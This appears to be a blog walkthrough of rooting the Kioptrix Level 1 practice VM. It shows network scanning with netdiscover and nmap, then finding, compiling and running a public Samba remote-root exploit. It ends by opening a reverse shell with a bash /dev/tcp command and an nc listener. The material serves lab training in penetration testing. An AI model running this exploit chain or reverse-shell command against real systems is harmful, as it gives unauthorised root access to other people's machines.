root@KaliLNX:~# netdiscover -r 123.123.123.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
123.123.123.100 00:0c:29:d5:d9:e9 1 60 VMware,Inc.
nmap -T4 -A -v 123.123.123.100
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
| 1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
| 1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_ 1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
| Supported Methods: GET HEAD OPTIONS TRACE
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 1024/tcp status
|_ 100024 1 1024/udp status
139/tcp open netbios-ssn Samba smbd (workgroup: VMYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
|_ssl-date: 2018-10-01T21:16:49+00:00; +14h01m47s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
|_ SSL2_RC4_64_WITH_MD5
1024/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:D5:D9:E9 (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Uptime guess: 0.005 days (since Mon Oct 1 14:12:01 2018)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=198 (Good luck!)
IP ID Sequence Generation: All zeros
Let attack: 139/tcp open netbios-ssn Samba smbd (workgroup: VMYGROUP)
/usr/share/exploitdb/platforms/
searchsploit samba |grep 2.2
Samba < 2.2.8 (Linux/BSD) - Remote Code Execution multiple/remote/10.c
cp /usr/share/exploitdb/platforms/multiple/remote/10.c .
gcc 10.c -o samba-2.2.1a-exploit
root@KaliLNX:/opt/VMs/Kioptrix_Level_1# ./samba-exploit
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
Usage: ./samba-exploit [-bBcCdfprsStv] [host]
-b
-B
-c
-C
-d
-f force
-p
-r
-s scan mode (random)
-S
-t
-v verbose mode
root@KaliLNX:/opt/VMs/Kioptrix_Level_1# ./samba-2.2.1a-exploit -b 0 123.123.123.100
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
+ Bruteforce mode. (Linux)
+ Host is running samba.
+ Worked!
--------------------------------------------------------------
*** JE MOET JE MUIL HOUWE
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)
* On our Kali:
nc -nlvp 4444
* On our victime shell
bash -i >& /dev/tcp/123.123.123.201/4444 0>&1
* Go back to our Kali:
root@KaliLNX:~# nc -nlvp 4444
listening on [any] 4444 ...
connect to [123.123.123.201] from (UNKNOWN) [123.123.123.100] 1025
bash: no job control in this shell
[root@kioptrix tmp]#
[root@kioptrix tmp]#
[root@kioptrix tmp]# pwd
pwd
/tmp
[root@kioptrix tmp]# ls -la
ls -la
total 2
drwxrwxrwt 2 root root 1024 Oct 1 17:29 .
drwxr-xr-x 19 root root 1024 Oct 1 17:13 ..
[root@kioptrix tmp]#
No comments:
Post a Comment